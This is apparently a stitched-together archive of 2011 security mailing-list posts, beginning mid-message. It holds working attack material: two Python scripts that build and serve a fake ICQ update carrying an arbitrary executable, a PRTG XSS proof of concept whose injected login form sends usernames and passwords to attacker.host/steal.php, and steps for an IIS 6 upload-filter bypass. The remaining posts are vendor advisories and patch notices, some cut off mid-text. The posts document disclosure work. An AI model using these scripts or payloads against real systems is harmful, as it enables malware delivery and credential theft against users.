> (3) Impersonate the update server. To verify the vulnerability, the
> easiest way is to add an entry for update.icq.com to the victim's
> \Windows\system32\drivers\etc\hosts file that points to the fake update
> server's IP address and clearing it's DNS cache afterwards (ipconfig
> /flushdns).
>
> The next victim that is affected by the impersonation and that launches
> the ICQ client will now automatically download and install the fake
> update. On the next restart of the ICQ software, the fake ICQ.exe will
> be executed.
>
>
> SOLUTION
>
> Stop using ICQ or switch to another IM client until a fix is released
> since ICQ 7 does not offer to disable automatic updates.
>
>
> TIMELINE
>
> 2010-11-12
> discovered issue
>
> 2010-11-13
> reported issue to cert.org
>
> 2010-11-30
> received confirmation from cert.org that they try to contact the vendor
>
> 2011-01-13
> cert.org publishes vulnerability note because the vendor doesn't react
>
>
> REFERENCES
>
> Vulnerability Note at cert.org:
> http://www.kb.cert.org/vuls/id/680540
>
>
> FILES
>
> === START build_update_files.py ===
>
> #!/usr/bin/env python
>
> # ICQ Update File Creator by Daniel Seither (p...@tiwoc.de)
> #
> # Parameter:
> # filename of .exe that should be delivered as an update for ICQ.exe
> #
> # Overwrites ICQ.zip and updates.xml in the current directory
> # without a warning!
>
> import sys, os
> from hashlib import md5
> from zipfile import ZipFile, ZIP_DEFLATED
>
> if len(sys.argv) < 2:
> print "argument missing"
> sys.exit(1)
>
> f = open(sys.argv[1])
> payload = f.read()
> f.close()
>
> payload_checksum = md5(payload).hexdigest()
> payload_size = len(payload)
>
> f = ZipFile('ICQ.zip', 'w')
> f.write(sys.argv[1], 'ICQ.exe', ZIP_DEFLATED)
> f.close()
>
> payload_compressed = os.path.getsize('ICQ.zip')
>
> updatesfile = (''
> + 'http://update.icq.com/cb/icq6/30009/"/>'
> + ''
> + ''
> + ''
> ) % (payload_checksum, payload_size, payload_compressed)
>
> updatesfile_checksum = md5(updatesfile).hexdigest()
> updatesfile = '\r\n%s' % (updatesfile_checksum, updatesfile)
>
> f = open('updates.xml', 'w')
> f.write(updatesfile)
> f.close
>
> === END build_update_files.py ===
>
> === START run_update_server.py ===
>
> #!/usr/bin/env python
>
> # Fake ICQ update server by Daniel Seither (p...@tiwoc.de)
> #
> # Must be run
> # * as root
> # * from a directory containing updates.xml and ICQ.zip
> #created by build_updates_xml.py
>
> from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
>
> class ICQRequestHandler(BaseHTTPRequestHandler):
> def do_GET(self):
> if self.path == '/cb/icq6/30009/0/updates.xml':
> self._respond_with_file('updates.xml')
> elif self.path == '/cb/icq6/30009/ICQ.zip':
> self._respond_with_file('ICQ.zip')
> else:
> self.send_error(404)
>
> def _respond_with_file(self, filename):
> f = open(filename)
> self.send_response(200)
> self.end_headers()
>
PRTG V8.1.2.1809 XSS Bugs in login.htm and error.htm
XSS (Reflected) Bugs in login.htm and error.htm PRTG V8.1.2.1809 (All OS Versions): http://www.paessler.com/ I have discovered two XSS bugs within PRTG version 8.1.2.1809. These bugs are in the login.htm and error.htm documents. These issues were possible because of a lack of input checking of the errormsg and errorurl GET parameters within login.htm. Output encoding routines were also not consistently used throughout the application. PoC: https://localhost/public/login.htm?loginurl=%2Fpublic%2F&errormsg=%3C/div%3E%3C/form%3E%3Ctable%3E%3Cform%20action=%22http://attacker.host/steal.php%22%20method=%22GET%22%3E%3Ctr%3E%3Ctd%3ELogin%20Name:%3C/td%3E%3Ctd%3E%3Cinput%20class=%22text%22%20id=%22loginusername%22%20name=%22username%22%20type=%22text%22%20value=%22%22%20%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3EPassword:%3C/td%3E%3Ctd%3E%3Cinput%20class=%22text%22%20%20id=%22loginpassword%22%20name=%22password%22%20type=%22password%22%20value=%22%22%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3E%3Ctd%3E%3Cinput%20id=%22submitter%22%20class=%22submit%22%20type=%22submit%22%20value=%22Login%22%3E%3C/td%3E%3C/tr%3E%3C/form%3E%3C/table%3E%3Ciframe%20width=0%20height=0%20src=%22&loginurl=%2Fhome https://localhost/error.htm?errormsg=%22%3E%3Cimg%20src=%22kaasdfasdf%22%20onerror=%22javascript:alert%28/test/%29%22/%3E&errorurl=%22%3E%3Cimg%20src=%22kaasdfasdf%22%20onerror=%22javascript:alert%28/test/%29%22/%3E The vendor was very responsive and has fixed these issues in version 8.2.0.1898/189 released on January 17th 2011. -- Thanks, Joshua Gimer --- http://www.linkedin.com/in/jgimer http://twitter.com/jgimer
VUPEN Security Research - Novell GroupWise "TZID" Variable Remote Buffer Overflow Vulnerability (VUPEN-SR-2011-004)
VUPEN Security Research - Novell GroupWise VCALENDAR "TZID" Variable Remote Buffer Overflow Vulnerability (VUPEN-SR-2011-004) http://www.vupen.com/english/research.php I. BACKGROUND - "Novell GroupWise collaboration software is a premier collaboration tool for large enterprise. Look no further than Novell for your collaboration software." (Wikipedia) II. DESCRIPTION - VUPEN Vulnerability Research Team discovered a critical vulnerability in Novell GroupWise. The vulnerability is caused by a buffer overflow error in the "g1.dll" module when processing the "TZID" variable within VCALENDAR data, which could be exploited by remote unauthenticated attackers to execute arbitrary code with SYSTEM privileges. CVSS Score: 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) III. AFFECTED PRODUCTS --- Novell GroupWise version 8.02 HP 1 (Hot Patch 1) and prior IV. Binary Analysis & Exploits/PoCs --- In-depth binary analysis of the vulnerability and a code execution exploit are available through the VUPEN Binary Analysis & Exploits Service : http://www.vupen.com/english/services/ba-index.php V. VUPEN Threat Protection Program --- Organizations and corporations which are members of the VUPEN Threat Protection Program (TPP) receive advanced notifications about security vulnerabilities discovered by VUPEN, and have access to a detailed detection guidance to proactively protect national and critical infrastructures against potential attacks exploiting this vulnerability: http://www.vupen.com/english/services/tpp-index.php VI. SOLUTION Upgrade to Novell GroupWise version 8.02 HP 2 (Hot Patch 2). VII. CREDIT -- This vulnerability was discovered by Sebastien Renaud of VUPEN Security VIII. ABOUT VUPEN Security --- VUPEN is a leading IT security research company providing vulnerability management and security intelligence solutions which enable enterprises and institutions to eliminate vulnerabilities before they can be exploited, ensure security policy compliance and meaningfully measure and manage risks. Governmental and federal agencies, and global enterprises in the financial services, insurance, manufacturing and technology industries rely on VUPEN to improve their security, prioritize resources, cut time and costs, and stay ahead of the latest threats. * VUPEN Vulnerability Notification Service (VNS) : http://www.vupen.com/english/services/vns-index.php * VUPEN Binary Analysis & Exploits Service (BAE) : http://www.vupen.com/english/services/ba-index.php * VUPEN Threat Protection Program for Govs (TPP) : http://www.vupen.com/english/services/tpp-index.php * VUPEN Web Application Security Scanner (WASS) : http://www.vupen.com/english/services/wass-index.php IX. REFERENCES -- http://www.vupen.com/english/research-vuln.php http://www.vupen.com/english/advisories/2011/0220 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4325 http://www.novell.com/support/viewContent.do?externalId=7007638&sliceId=1 X. DISCLOSURE TIMELINE - 2010-11-22 - Vulnerability discovered 2010-xx-xx - Vulnerability rediscovered by third parties including ZDI 2011-01-25 - Novell fix released
Microsoft IIS 6 parsing directory �x.asp� Vulnerability
# Microsoft IIS 6 parsing directory Vulnerability #Discovered by: Pouya daneshmand whh_iran[AT]yahoo[DOT]com http://securitylab.ir/blog #Introduction: Using this vulnerability you can bypass some Security filters, for example a file with Â.jpg or Â.rar extension can be executed as an asp (Active Server Page) file. #Vulnerable: It just works for asp files and works on Windows 2003 / IIS 6 (As I tested...). The test failed on IIS 5.1 and IIS 7. #Description: 1) Create a Folder with '.asp' extension. 2) Insert your ASP code in a file with any extension (like .jpg,.rar,.txt) in the folder you have created. 3) Open the file with your browser and you will see it's executed as an asp file! #Note: The Extension of file does not matter at all! #Solution: There is no patch to fix this security vulnerability yet, the best thing I can say is to DISABLE ASP FILES FROM YOUR "web server extensions"! Or Remove Âexecute permission from the upload directories. #PS: This vulnerability was reported for first time at 2010-06-19 in Persian (http://sebug.net/vulndb/19820/) #Original Advisory: http://securitylab.ir/blog/dl/Microsoft-IIS6-parsing-directory-Vulnerability.pdf http://securitylab.ir/blog/posts/11/Microsoft-IIS-6-parsing-directory-%E2%80%9Cx.asp%E2%80%9D-Vulnerability/
HTB22795: Path disclosure in Hycus CMS
Vulnerability ID: HTB22795 Reference: http://www.htbridge.ch/advisory/path_disclousure_in_hycus_cms.html Product: Hycus CMS Vendor: Hycus Web Development Team ( http://www.hycus.com/ ) Vulnerable Version: 1.0.3 and probably prior versions Vendor Notification: 13 January 2011 Vulnerability Type: Path disclosure Status: Awaiting Vendor Response Risk level: Low Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) Vulnerability Details: The vulnerability exists due to failure in the "/templates/hycus_template/template.php" script, it's possible to generate an error that will reveal the full path of the script. A remote user can determine the full path to the web root directory and other potentially sensitive information. http://host/templates/hycus_template/template.php
ESA-2011-003: EMC NetWorker librpc.dll spoofing vulnerability.
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ESA-2011-003: EMC NetWorker librpc.dll spoofing vulnerability. EMC Identifier: ESA-2011-003 CVE Identifier: CVE-2011-0321 Severity Rating: CVSS v2 Base Score: 8.5 (AV:N/AC:L/Au:N/C:P/I:N/A:C) Affected products: EMC NetWorker earlier than 7.5.3.5 EMC NetWorker earlier than 7.6.1.2 Vulnerability Summary: A vulnerability exists in EMC NetWorker which can be exploited to potentially create a denial of service condition or eavesdrop on process communications. Vulnerability Details: EMC Networker uses an RPC library to provide a portmapper service within nsrexecd. The portmapper restricts access for service commands to the localhost. However, the UDP protocol allows malicious users to spoof the source address of the network packet making it appear it originated from the localhost. This potentially may allow a remote malicious user to unregister existing NetWorker RPC services or register new RPC services. Problem Resolution: The following EMC NetWorker products contain resolutions to this issue: EMC NetWorker version 7.5.3.5 EMC NetWorker version 7.5 SP4 and later EMC NetWorker version 7.6.1.2 and later EMC strongly recommends all customers apply the latest patches which contain the resolution to this issue, at the earliest opportunity. Link to remedies: For 7.5 SP3 and earlier users: This fix is available in build 7.5.3.5 and 7.5 SP4. EMC recommends updating to the 7.5 SP4 version. Registered EMC Powerlink customers can download the NetWorker 7.5 SP4 software from Powerlink. For NetWorker Software, navigate in Powerlink to Home > Support > Software Downloads and Licensing > Downloads J-O > NetWorker. For 7.6 SP1 and 7.6 users: The fix is available in 7.6.1.2 and subsequent cumulative build releases. For details on the 7.6.1.x cumulative fix releases including download details, refer to the NetWorker 7.6 Cumulative Hotfix Summary document on EMC Powerlink. Because the view is restricted based on customer agreements, you may not have permission to view certain downloads. Should you not see a software download you believe you should have access to, follow the instructions in EMC Knowledgebase solution emc116045. For explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC recommends that all customers take into account both the base score and any relevant temporal and environmental scores, which may impact the potential severity associated with particular security vulnerability. Credits: EMC would like to thank an anonymous researcher working with TippingPoint's Zero Day Initiative (http://www.zerodayinitiative.com) for reporting this issue. EMC Corporation distributes EMC Security Advisories in order to bring to the attention of users of the affected EMC products important security information. EMC recommends all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided "as is" without warranty of any kind. EMC disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event shall EMC or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. EMC Product Security Response Center security_al...@emc.com http://www.emc.com/contact-us/contact/product-security-response-center.htm -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (Cygwin) iEYEARECAAYFAk1AmSsACgkQtjd2rKp+ALyxkwCeIB5VSY1U6/1h/yWAluRlERtj 40sAoIHN3TfWLIq+t9wR0WtmYQknZVws =ddyY -END PGP SIGNATURE-
[USN-1051-1] HPLIP vulnerability
=== Ubuntu Security Notice USN-1051-1 January 25, 2011 hplip vulnerability CVE-2010-4267 === A security issue affects the following Ubuntu releases: Ubuntu 8.04 LTS Ubuntu 9.10 Ubuntu 10.04 LTS Ubuntu 10.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 8.04 LTS: hplip 2.8.2-0ubuntu8.2 Ubuntu 9.10: hplip 3.9.8-1ubuntu2.1 Ubuntu 10.04 LTS: hplip 3.10.2-2ubuntu2.2 Ubuntu 10.10: hplip 3.10.6-1ubuntu10.2 In general, a standard system update will make all the necessary changes. Details follow: Sebastian Krahmer discovered that HPLIP incorrectly handled certain long SNMP responses. A remote attacker could send malicious SNMP replies to certain HPLIP tools and cause them to crash or possibly execute arbitrary code. Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.8.2-0ubuntu8.2.diff.gz Size/MD5:78384 a609e82f554318d5bbdfd27632aac0d7 http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.8.2-0ubuntu8.2.dsc Size/MD5: 1958 41b1bf5566d664b0621eb6463feac578 http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.8.2.orig.tar.gz Size/MD5: 14195737 ea57b92483622d3eae359994c5fd3dc3 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hpijs-ppds_2.8.2+2.8.2-0ubuntu8.2_all.deb Size/MD5: 1529562 06996ed3451b696d402e86743be75aa6 http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-data_2.8.2-0ubuntu8.2_all.deb Size/MD5: 7019388 12bbd8af2557985100184fa97d376c9f http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-doc_2.8.2-0ubuntu8.2_all.deb Size/MD5: 4167650 fe60550b24dd91ffa89056539f26931e http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-gui_2.8.2-0ubuntu8.2_all.deb Size/MD5: 128466 e18fa06397d94412b4df566915273f2c amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hpijs_2.8.2+2.8.2-0ubuntu8.2_amd64.deb Size/MD5: 382342 3cce7d39faddf51df4f7aab06f253ffb http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-dbg_2.8.2-0ubuntu8.2_amd64.deb Size/MD5: 811700 58acebac939cd452a2661cefe9572a08 http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.8.2-0ubuntu8.2_amd64.deb Size/MD5: 321006 24139fdee705999ee79118463bbe4912 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hpijs_2.8.2+2.8.2-0ubuntu8.2_i386.deb Size/MD5: 374298 8ed6b85295c473b8aa62f52d6d3c499b http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-dbg_2.8.2-0ubuntu8.2_i386.deb Size/MD5: 788212 2ad39471fdbbe28865e6da6c2da629ca http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.8.2-0ubuntu8.2_i386.deb Size/MD5: 308746 82813ba1cc72945a104761b0c3bd9998 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/h/hplip/hpijs_2.8.2+2.8.2-0ubuntu8.2_lpia.deb Size/MD5: 377158 c673232d8aab4de7683b04dcf3d9fdfd http://ports.ubuntu.com/pool/main/h/hplip/hplip-dbg_2.8.2-0ubuntu8.2_lpia.deb Size/MD5: 794602 cbe69bf6dc2f2b7d999b95d8dcbfa619 http://ports.ubuntu.com/pool/main/h/hplip/hplip_2.8.2-0ubuntu8.2_lpia.deb Size/MD5: 307760 9075374da700578984bdcb6ffc0f3573 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/h/hplip/hpijs_2.8.2+2.8.2-0ubuntu8.2_powerpc.deb Size/MD5: 388460 50aaf8b7160ae90485d4c4c0345e970e http://ports.ubuntu.com/pool/main/h/hplip/hplip-dbg_2.8.2-0ubuntu8.2_powerpc.deb Size/MD5: 824864 fd0b586edf940365ddfd00cbb62a2ac0 http://ports.ubuntu.com/pool/main/h/hplip/hplip_2.8.2-0ubuntu8.2_powerpc.deb Size/MD5: 337010 83552e1c1c18617aa5bad08a141009a8 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/h/hplip/hpijs_2.8.2+2.8.2-0ubuntu8.2_sparc.deb Size/MD5: 371608 e71a3697c81d7aea3f7b0ad28e573863 http://ports.ubuntu.com/pool/main/h/hplip/hplip-dbg_2.8.2-0ubuntu8.2_sparc.deb Size/MD5: 755986 e60ec90f9bf59b28dfebda6889dd82ba http://ports.ubuntu.com/pool/main/h/hplip/hplip_2.8.2-0ubuntu8.2_sparc.deb Size/MD5: 307220 b7399af191ff0d7995f5ebfd16f37daf Updated packages for Ubuntu 9.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_3.9.8-1ubuntu2.1.diff.gz Size/MD5:91802 5c588019ec33661ddeaa748c9b2a00d7 http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_3.9.8-1ubuntu2.1.dsc Size/MD5: 2521 ac59f7004536fe
[security bulletin] HPSBMA02626 SSRT100301 rev.1 - HP OpenView Storage Data Protector, Remote Denial of Service (DoS)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c02699143 Version: 1 HPSBMA02626 SSRT100301 rev.1 - HP OpenView Storage Data Protector, Remote Denial of Service (DoS) NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2011-01-24 Last Updated: 2011-01-24 -- Potential Security Impact: Remote Denial of Service (DoS) Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP OpenView Storage Data Protector. The vulnerability could be remotely exploited to create a Denial of Service (DoS). References: CVE-2011-0275 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP OpenView Storage Data Protector v6.11 running on Windows 2000, XP, 2003, 2008 or Vista. HP OpenView Storage Data Protector v6.10 running on Windows 2000, XP, 2003, 2008 or Vista. HP OpenView Storage Data Protector v6.0 running on Windows 2000, XP, 2003. BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2011-0275(AV:N/AC:M/Au:N/C:N/I:N/A:C) 7.1 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has provided the following software patches to resolve this vulnerability. Operating System / Description / Patch ID Windows Vista, XP, 2008, 2003, 2000 / OV DP 6.11 Win - Core / DPWIN_00475 Windows Vista, XP, 2008, 2003, 2000 / OV DP 6.10 Win - Core / DPWIN_00489 Windows XP, 2003, 2000 / OV DP 6.00 Win - Core / DPWIN_00488 The patches are available for download from http://support.openview.hp.com/selfsolve/patches MANUAL ACTIONS: No HISTORY Version: 1 (rev.1) - 24 January 2011 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: security-al...@hp.com Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches -check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems -verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do * The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing & Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. "HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement." Copyright 2
